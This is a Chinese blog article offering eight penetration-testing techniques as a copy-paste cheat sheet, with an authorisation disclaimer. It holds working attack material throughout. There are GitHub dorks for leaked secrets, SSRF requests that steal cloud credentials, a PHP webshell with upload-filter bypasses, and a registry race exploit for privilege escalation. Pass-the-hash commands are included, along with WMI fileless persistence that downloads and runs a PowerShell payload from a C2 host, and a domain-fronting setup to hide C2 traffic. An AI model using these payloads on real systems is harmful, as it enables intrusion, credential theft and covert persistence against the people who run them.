ARTICLE DETAIL

建站实战干货

来自一线的建站与推广经验沉淀,每一条都经过真实交付验证。

渗透测试实战指南:8 个高频好用但容易忽略的技巧

2026/8/4 21:54:24 拓冰建站 浏览量
渗透测试实战指南:8 个高频好用但容易忽略的技巧 在渗透测试实战中最让人头疼的往往不是找不到漏洞而是明明知道有办法却死活想不起来那个命令怎么写、那个 payload 怎么拼。本文整理了 8 个在实战中反复用到、但总是需要翻笔记的技巧每个都附了可以直接复制的 payload建议收藏备用。⚠️免责声明本文仅用于授权渗透测试场景请在合法授权范围内使用相关技术。未经授权的渗透测试行为属于违法行为。一、GitHub 信息泄露搜出硬编码密码很多开发团队会把配置文件不小心推到公开仓库。不需要什么高级工具GitHub 搜索本身就是一把利器。搜索语法plaintext# 搜索目标域名相关的硬编码密钥 site:github.com 目标公司名 password OR secret OR api_key OR token # 更精准的搜索直接找配置文件 site:github.com 目标公司名 filename:config OR filename:.env OR filename:application.yml # 找数据库连接字符串 site:github.com 目标公司名 mysql:// OR postgres:// OR mongodb://实战要点找到凭证后不要急着用先确认一下是否还在生效有时候密码已经轮换了再用这个凭证去尝试登录相关系统。实际测试中这个方法的成功率比你想象的要高得多。二、SSRF 打穿云元数据窃取云凭证碰到 SSRF 漏洞的时候大多数人只想到探测内网端口。但在云环境里SSRF 的真正价值是窃取云服务凭证。AWS 元数据窃取IMDSv1 方式plaintexthttp://169.254.169.254/latest/meta-data/iam/security-credentials/IMDSv2 方式需先获取 tokenbash# 第一步获取token curl -X PUT http://169.254.169.254/latest/api/token \ -H X-aws-ec2-metadata-token-ttl-seconds: 21600 # 第二步用token请求元数据 curl -H X-aws-ec2-metadata-token: $TOKEN \ http://169.254.169.254/latest/meta-data/其他云厂商元数据地址表格云厂商元数据地址阿里云http://100.100.100.200/latest/meta-data/腾讯云http://metadata.tencentyun.com/latest/meta-data/拿到 IAM 角色的临时凭证后直接用 aws cli 操作目标云账号。这个打法的回报率极高往往一个 SSRF 就能打穿整个云环境。三、文件上传绕过三板斧遇到文件上传功能按这三步走能过 90% 的过滤。第一步后缀名变形plaintextshell.php → shell.phtml / shell.php5 / shell.Php / shell.php.jpg常见绕过思路大小写绕过shell.Php、shell.pHp特殊后缀.phtml、.php5、.php7、.phar双后缀shell.php.jpg、shell.jpg.php第二步文件头伪造在 webshell 前面加个 GIF 文件头绕过只检查 magic bytes 的过滤php运行GIF89a?php eval($_POST[cmd]); ?第三步Nginx 解析漏洞利用如果目标用的是 Nginx上传文件名为shell.jpg然后访问plaintext/uploads/shell.jpg/x.phpNginx 会把x.php当作 PHP 解析前提是配置了cgi.fix_pathinfo1。技巧总结三招组合起来基本能覆盖大部分上传场景。实战中建议从易到难依次尝试。四、Linux 提权一键排查拿到一个低权限 shell 后别急着用 exp先跑一遍信息收集往往有意想不到的收获。一键信息收集脚本bashecho 系统信息 uname -a echo SUID文件 find / -perm -4000 -type f 2/dev/null echo Sudo配置 sudo -l 2/dev/null echo 可写的cron find /etc/cron* -writable 2/dev/null echo 敏感配置文件权限 ls -la /etc/passwd /etc/shadow 2/dev/null echo 运行中的服务 ps aux | grep root echo 环境变量中的密码 env | grep -i pass重点关注项表格检查项利用思路SUID 文件如果有find、vim、nmap等直接去 GTFOBins 查提权命令sudo -l看有没有 NOPASSWD 的配置或者可以利用的指令/etc/passwd 可写直接往里加一个 uid0 的用户内核版本uname -a拿到内核版本后去 exploit-db 搜对应的 exp五、Windows 注册表竞争条件提权CVE-2026-24291这是 2026 年的新洞利用 ATBroker 服务的注册表符号链接竞争条件思路非常巧妙。利用步骤cmd:: 第一步在HKCU下创建符号链接指向系统服务注册表项 reg add HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig /ve /d \\?\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver /f :: 第二步触发竞争条件锁定工作站触发ATBroker同步配置 rundll32.exe user32.dll,LockWorkStation :: 第三步等待锁屏同步完成后解锁验证权限 whoami原理分析ATBroker 在锁屏时会把 HKCU 的配置同步到 HKLM但不会验证符号链接的目标。我们提前在 HKCU 下埋好符号链接同步时就会把恶意数据写入系统服务配置。此时 msiserver 服务的 ImagePath 已被篡改重启服务即可以 SYSTEM 权限执行任意命令。六、内网横向移动Pass-the-Hash 一把梭拿到了一台机器的 NTLM 哈希不需要解密直接带着哈希去访问其他机器。用 impacket 套件执行 PTH 攻击bash# 在目标机器上执行命令 impacket-psexec -hashes :NTLM_HASH administrator192.168.1.100 # 用CrackMapExec批量扫描看这个哈希能登录哪些机器 crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH --shares # 如果是域环境直接拿域管的哈希打域控 impacket-wmiexec -hashes :NTLM_HASH domain_admindc01.corp.local实战要点哈希传递的核心优势是哈希不用解密直接传递。很多内网环境密码复杂度很高但密码复用率极高一个哈希打遍全网是常有的事。七、WMI 无文件持久化拿到权限后想留后门但怕被杀毒软件查杀WMI 事件订阅可以做到完全不落地。完整利用代码powershell# 创建WMI事件过滤器每5分钟触发一次 $filter Set-WmiInstance -Class __EventFilter -Namespace root\subscription -Arguments { NameSystemHealthCheck; EventNamespaceroot\cimv2; QueryLanguageWQL; QuerySELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System AND TargetInstance.SystemUpTime 300 } # 创建事件消费者执行命令 $consumer Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\subscription -Arguments { NameHealthCheckAction; CommandLineTemplatepowershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(http://your-c2.com/payload.ps1) } # 绑定过滤器和消费者 Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\subscription -Arguments {Filter$filter; Consumer$consumer}技术特点这套操作全程在内存和 WMI 仓库中完成磁盘上没有任何恶意文件。常规杀毒扫描基本查不到除非安全人员专门检查 WMI 订阅。隐蔽性极强。八、域前置技术隐蔽 C2 通道传统 C2 通道容易被防火墙和流量分析设备识别。用域前置技术让你的 C2 流量混在合法云服务流量里。原理示意plaintext你的流量 → Cloudflare/Azure CDN → 你的真实C2服务器配置方法以 Cloudflare 为例在 Cloudflare 上设置一个 Workers按 Host 头分流如果 Host 是cdn.legitimate-site.com→ 返回正常 CDN 内容如果 Host 是c2.your-domain.com→ 转发到你的真实 C2Cobalt Strike 配置plaintextHost: cdn.legitimate-site.com 给防御者看的 实际流量通过Cloudflare Worker路由到你的C2流量分析设备看到的是访问 Cloudflare 的正常 HTTPS 流量不会拦截。你的真实 C2 IP 永远不会暴露。总结渗透测试的核心从来不是工具是思路。上面这些技巧单拿出来都不复杂关键是知道 什么时候该想到用它。建议把这篇文章当速查手册用 —— 下次打渗透卡住了回来翻一翻说不定就能找到突破口。8 个技巧速查表表格序号技巧名称适用场景1GitHub 硬编码搜索信息收集阶段2SSRF 云元数据窃取云环境 SSRF 漏洞3文件上传绕过三板斧文件上传漏洞4Linux 提权一键排查Linux 权限提升5Windows 注册表竞争提权Windows 权限提升6Pass-the-Hash 横向移动内网横向渗透7WMI 无文件持久化权限维持8域前置隐蔽 C2C2 通信隐蔽⚠️再次提醒本文仅用于授权渗透测试场景请在合法授权范围内使用相关技术。遵守法律法规做合规的安全从业者。